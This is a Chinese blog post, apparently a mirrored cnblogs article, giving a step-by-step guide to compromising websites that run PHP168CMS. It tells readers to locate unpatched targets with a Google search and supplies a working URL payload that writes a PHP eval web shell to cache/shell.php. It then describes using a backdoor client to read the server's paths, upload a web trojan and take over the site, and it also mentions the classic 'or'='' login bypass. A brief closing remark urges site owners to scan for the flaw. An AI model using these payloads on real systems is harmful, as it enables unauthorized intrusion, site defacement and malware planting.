zoukankan      html  css  js  c++  java
  • 利用登陆文件注入漏洞给网页挂马

    本文操作方法十分简单,按照操作提示一步步来就可以完成了。不少网站在后台登陆框输入‘or’'='代码就可以直接登陆网站后台,这种方式曾经是最流行入侵方式,而今天讲的是如

    何利用login后台登陆文件漏洞注入代码。

    login.php(.asp/.aspx)文件一般都是作为CMS系统的管理员后台登陆文件,这里以PHP168CMS系统为例,login.php漏洞实际上的一个注入漏洞,是利用文件代码设计不良直

    接讲恶意代码直接上传到网站目录中。利用此漏洞可以进入网站,实行内容篡、网页挂马等手段。

    第一步,寻找使用PHP168CMS的网站

    在google中输入“powered by php168”,然后随意找到一个网站作为测试,主要是寻找没有打补丁的网站。然后在域名后面输入,例:http://lusongsong.com/login.php?

    makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>如果出现了登陆界面就表明漏洞被成功利用。(文中的入

    侵域名请换成搜索的网站域名)

    第二步,读取网站目录,获取网站绝对路径

    如果代码成功执行,木马就会保存在cacheshell.php文件中,然后下载一个“lanker微型PHP后门客户端”,在木马地址栏输入http://lusongsong.com/cache/shell.php,然后选

    择读取目录,如果连接成功就能显示出网站所在服务器中的绝对路径。

    第三步,开始上传PHP网页木马

    在lanker微型PHP后门的基本功能列表中选择上传网页木马,上传的文件会保存在cache目录中。在域名的后面输入“cache/网站木马文件名”就可以运行木马了,至此已经对使用

    PHP168CMS系统的网站获得了控制权,可以任意的修改和删除。

    其实存在login注入漏洞的不止PHP168一家,还有很多不知名的PHP网站源码都有这个漏洞,如果你使用的是PHP系统,请赶快检测你的程序是否有这个问题吧。对于PHP语言不了解

    的站长可以利用PHP注入漏洞扫描工具对你的网站进行扫描,例如:CASI、PHP-Mysql注入分析器、ZBSI等工具。更详细方法可以google一下:“如何预防和检测网页挂马”。

  • 相关阅读:
    centos7 安装jdk及mysql8
    centos7 挂载数据盘
    windows server r2 之如何设置共享文件夹访问不需要输入用户名和密码
    svn 常见问题记录
    设计模式之代理模式
    ASP.Net在64位环境开发部署常见问题
    oracle 之创建用户,表空间,授权,修改用户密码
    oracle 常用语句
    IIS服务器 远程发布(Web Deploy)配置 VS2010 开发环境 Windows Server 2008服务器系统
    vs2012使用64位IIS EXPRESS调试
  • 原文地址:https://www.cnblogs.com/baocheng/p/3898715.html
Copyright © 2011-2022 走看看